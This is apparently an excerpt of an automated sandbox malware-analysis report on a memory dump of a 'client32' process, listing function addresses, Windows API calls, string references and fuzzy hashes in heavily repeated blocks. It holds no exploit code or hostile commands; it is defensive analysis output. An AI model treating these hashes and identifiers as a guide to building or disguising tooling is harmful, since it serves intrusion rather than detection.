e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5

Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
SetLastError.KERNEL32(00000078), ref: 11017409

Strings

QueueUserWorkItem, xrefs: 110173DE

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: QueueUserWorkItem
API String ID: 199729137-2469634949
Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0

Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
SetLastError.KERNEL32(00000078), ref: 1101D351

Strings

FlashWindowEx, xrefs: 1101D32E

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: FlashWindowEx
API String ID: 199729137-2859592226
Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90

Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
m_hWnd, xrefs: 110010A6

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitItemLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2046328329-2830328467
Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5

Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 11001083

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
m_hWnd, xrefs: 11001066

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 819365019-2830328467
Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0

Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(?,?,?,?), ref: 11001113

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
m_hWnd, xrefs: 110010F6

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastPostProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 906220102-2830328467
Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0

Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001014,?,?), ref: 110151D4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110151B6
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0

Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11017206
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694

Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 1100114B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
m_hWnd, xrefs: 11001136

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1604732272-2830328467
Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4

Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 1100102B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
m_hWnd, xrefs: 11001016

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390

Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180

Strings

MSOfficeWClass, xrefs: 11113165

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FindMessageSendWindow
String ID: MSOfficeWClass
API String ID: 1741975844-970895155
Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC

Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 1115F323
..\ctl32\wndclass.cpp, xrefs: 1115F31E

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

